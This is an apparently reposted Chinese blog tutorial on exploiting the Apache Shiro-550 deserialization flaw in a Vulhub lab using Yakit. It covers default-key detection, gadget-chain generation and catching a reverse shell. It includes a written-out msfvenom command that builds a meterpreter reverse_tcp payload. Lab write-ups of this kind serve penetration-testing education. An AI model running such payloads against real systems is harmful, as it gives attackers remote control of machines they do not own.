文章总结： 本文介绍了使用Yakit工具对Shiro-550漏洞进行反连Shell命令执行的利用过程。通过搭建Vulhub环境，利用MITM功能检测默认Key，借助内置Yso-Java-hack生成利用链与反向连接代码。文章详细演示了配置监听器、生成Payload及建立反向连接的步骤，为安全测试人员提供了利用Yakit进行Java反序列化攻击的实战参考。 综合评分： 78 文章分类： 安全工具,漏洞POC,WEB安全,渗透测试,实战经验

yakit shiro-550 反连shell命令执行

原创

进击的hack

进击的HACK

2025年4月10日 07:50 江苏

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途给予盈利等目的，否则后果自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

前言

今天以vulhub的shiro的案例，介绍一下yakit的反向连接功能。

环境准备

• • ubutnu22
• • docker
• • vulhub https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2016-4437

IP ubuntu 192.168.56.31 yakit所在主机 192.168.56.1

shiro 探测

MITM 开启 shiro自定义检测

勾选rememberme，输入随便什么账号密码，抓包

在yakit菜单栏的“bug”上，能看到已经检测到shiro默认key。

查看详情

接下来，让我们通过yakit内置的利用链，反弹shell。

反向连接

代码生成器本文没用到，但我觉得还是介绍一下。它相当于将常见的反弹shell命令集成到一块。真不愧是个综合平台。

代码生成器

生成反向连接的代码

MSF版本

结果：

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=8085 -f elf -o reverse.elf

开启端口监听

监听中……

我们选择下图标记1的Yso-Java-hack，生成利用链，添加反向连接的IP和端口

代码发送到yak runner模块，因为yakit默认的利用代码就是shiro。所以我们不需要做太多的更改，只要取消注释，添加目标URL参数。

目标URL，点击右上角的执行

此时，查看监听器，可以看到有来自192.168.56.32反向连接

注意：如果你此时无法在终端输入信息，把右上角的原始模式关掉

此时，就可以直接使用了

往期推荐

yakit 替换本地JS 解决AES+Rsa加密

攻防演练中 elasticsearch 如何利用

通过Web Fuzzer 序列，爆破一次性key和iv的加密数据包

yakit 调用jsRpc加解密，免去抠代码补环境

代码审计 | 一次JWT任意用户登录审计

Yakit JWT Token 弱口令枚举

yakit 弱口令爆破与未授权检测

yakit 验证码识别 进行webfuzzer

yakit 安装和初次使用

burpsuite指纹识别插件合集

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：进击的HACK 进击的hack《yakit shiro-550 反连shell命令执行》